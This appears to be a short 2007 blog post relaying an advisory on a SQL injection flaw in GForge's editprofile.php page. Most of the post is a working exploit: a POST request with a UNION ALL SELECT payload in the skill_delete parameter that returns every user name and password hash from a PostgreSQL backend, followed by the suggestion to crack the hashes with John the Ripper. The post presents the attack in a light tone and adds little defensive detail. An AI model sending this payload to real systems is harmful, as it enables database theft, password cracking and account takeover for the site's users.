Gforge SQL Injection

September 13, 2007

Original Advisory: http://www.portcullis-security.com/179.php 

The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points.

The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database.

The hashes can then be cracked using john-the-ripper.

Exploit:-

POST request to:/www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+

from+users–%3d1&MultiDelete=Delete

works against postgres database :).

Refer to the paper for exploiting sql injections against postgres database. 

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback